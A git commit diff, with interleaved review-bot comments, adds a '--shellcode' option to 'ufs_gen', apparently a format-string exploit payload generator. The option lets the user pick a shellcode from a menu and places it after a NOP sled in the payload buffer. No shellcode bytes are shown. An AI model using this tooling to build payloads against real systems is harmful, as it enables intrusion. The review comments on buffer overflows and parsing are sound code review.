authorOlivier Gayot <duskcoder@gmail.com>2014-01-27 23:43:25 +0000
committerOlivier Gayot <duskcoder@gmail.com>2014-01-27 23:45:21 +0000
commit9756784b22d6be33683b9ecb3040c67685d354f7 (patch)
treec06b2df5368a303036cd451b67cdb5f5915ce13b /main.c
parent4bf33acfc969aa9b45470c481ec303ab7cdc9625 (diff)
add the option --shellcode
the user is now able to get a list of common shellcodes to append between the null bytes and the suffix. closes #1
Diffstat (limited to 'main.c')
-rw-r--r--main.c67
1 files changed, 58 insertions, 9 deletions
diff --git a/main.c b/main.c
index 1c4bc17..30605f1 100644
--- a/main.c
+++ b/main.c
@@ -24,6 +24,7 @@
#include <stdio.h>
#include <getopt.h>
+#include "shellcodes.h"
static unsigned char payload[4096];
@@ -48,6 +49,11 @@ static char *suffix_g = NULL;
/* how many NOP bytes (0x90) shall we append before suffix */
static int suffix_nops_g = 0;
+/* shall we display a menu with the possible shellcodes ? */
+static bool select_shellcode_g = false;
+
+static char *shellcode_g = NULL;
+
__attribute__((noreturn))
static void usage(const char *arg0)
{
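Review bot: `shellcode_g` is the only global in this group without a comment, so a reader has to go to main() to learn what it holds and when it is NULL. Going by the assignment later in this commit, something like `/* payload of the shellcode picked from the menu, NULL when none was selected */` above the declaration would match the style of the neighbouring globals.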
@@ -57,7 +63,9 @@ static void usage(const char *arg0)
fputs(
"ufs_gen "
"[--prefix pfx] [--suffix sfx] [--sfxnops n]\n"
- " --override addr --with addr --stackidx idx\n", stderr);
+ " --override addr --with addr --stackidx idx\n"
+ " --shellcode\n"
+ , stderr);
exit(EX_USAGE);
}
@@ -82,16 +90,18 @@ static int parse_arguments(int argc, char *argv[])
OPT_PREFIX,
OPT_SUFFIX,
OPT_SFX_NOPS,
+ OPT_SHELLCODE,
};
static struct option long_options[] = {
- {"override", required_argument, 0, OPT_OVERRIDE},
- {"with", required_argument, 0, OPT_WITH},
- {"stackidx", required_argument, 0, OPT_STACKIDX},
- {"addrsize", required_argument, 0, OPT_ADDR_SIZE},
- {"prefix", required_argument, 0, OPT_PREFIX},
- {"suffix", required_argument, 0, OPT_SUFFIX},
- {"sfxnops", required_argument, 0, OPT_SFX_NOPS},
+ {"override", required_argument, 0, OPT_OVERRIDE},
+ {"with", required_argument, 0, OPT_WITH},
+ {"stackidx", required_argument, 0, OPT_STACKIDX},
+ {"addrsize", required_argument, 0, OPT_ADDR_SIZE},
+ {"prefix", required_argument, 0, OPT_PREFIX},
+ {"suffix", required_argument, 0, OPT_SUFFIX},
+ {"sfxnops", required_argument, 0, OPT_SFX_NOPS},
+ {"shellcode", no_argument, 0, OPT_SHELLCODE},
};
int option_index;
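Review bot: The `long_options` array, as rewritten here, ends with the `"shellcode"` entry and has no all-zero terminator, which getopt_long() requires as the last element. Without it the lookup can read past the end of the array, for example when an argument matches none of the listed names. Add `{0, 0, 0, 0},` as the final entry. The rest of parse_arguments() lies outside this hunk, so the call site itself is not visible here.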
@@ -131,6 +141,9 @@ static int parse_arguments(int argc, char *argv[])
case OPT_SFX_NOPS:
suffix_nops_g = atoi(optarg);
break;
+ case OPT_SHELLCODE:
+ select_shellcode_g = true;
+ break;
default:
/*
* we must have accessed an option which we do not have
@@ -198,6 +211,30 @@ int main(int argc, char *argv[])
usage(argv[0]);
}
+ if (select_shellcode_g) {
+ for (;;) {
+ char buffer[256];
+ int sel;
+
+ /* display the name of the common shellcodes */
+ for (int _i = 0; _i < SHELLCODE_COUNT; ++_i) {
+ fprintf(stderr, "%02d - %s\n", _i + 1, common_shellcodes_g[_i].name);
+ }
+ fputs("select a shellcode. CTRL-D for no shellcode: ", stderr);
+
+ if (fgets(buffer, sizeof(buffer), stdin) == NULL)
+ break;
+
+ /* check if the selection is valid */
+ sel = atoi(buffer);
+ if (sel <= 0 || sel > SHELLCODE_COUNT)
+ continue;
+
+ shellcode_g = common_shellcodes_g[sel - 1].payload;
+ break;
+ }
+ }
+
if (prefix_g != NULL) {
int len_pfx = strlen(prefix_g);
int mod_len_pfx = len_pfx % address_size_g;
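Review bot: `sel = atoi(buffer)` in the selection loop cannot distinguish a non-numeric line from the value 0, and its behaviour is undefined when the typed number does not fit in an int. Parsing with strtol() keeps the same re-prompt behaviour while rejecting both cases explicitly: `char *end; long v = strtol(buffer, &end, 10);` followed by `if (end == buffer || v <= 0 || v > SHELLCODE_COUNT) continue;`, then index with `v - 1`. The same concern applies to `suffix_nops_g = atoi(optarg)` visible as context in the option-parsing hunk. main() continues outside this hunk.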
@@ -242,11 +279,23 @@ int main(int argc, char *argv[])
++idx_stack_g;
}
- fprintf(stderr, "NOP bytes are at offset %d (%#x)\n", i, i);
+ /* append the NOP bytes */
+ if (suffix_nops_g > 0) {
+ fprintf(stderr, "NOP bytes are at offset %d (%#x)\n", i, i);
+ }
for (int nop = 0; nop < suffix_nops_g; ++nop) {
payload[i++] = '\x90';
}
+ /* append the shellcode */
+ if (shellcode_g != NULL) {
+ fprintf(stderr, "shellcode is at offset %d (%#x)\n", i, i);
+ int len_shellcode = strlen(shellcode_g);
+
+ memcpy(payload + i, shellcode_g, len_shellcode);
+ i += len_shellcode;
+ }
+
if (suffix_g != NULL) {
fprintf(stderr, "suffix is at offset %d (%#x)\n", i, i);
int len_suffix = strlen(suffix_g);
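Review bot: The new `memcpy(payload + i, shellcode_g, len_shellcode)` writes into the 4096-byte static `payload` without checking that `i + len_shellcode` still fits, so the tool can overflow its own buffer. `i` has already been advanced by the NOP loop just above, whose count comes unchecked from `--sfxnops`. Guard the copy with `if (i < 0 || (size_t)len_shellcode > sizeof(payload) - (size_t)i) { fputs("payload too large\n", stderr); exit(EX_USAGE); }`. The NOP loop needs the equivalent check of `suffix_nops_g` against the remaining space, and `len_shellcode` would be better declared as `size_t` to match strlen(). The enclosing main() begins and ends outside this hunk, so the earlier writes to `payload` are not visible here and may need the same treatment.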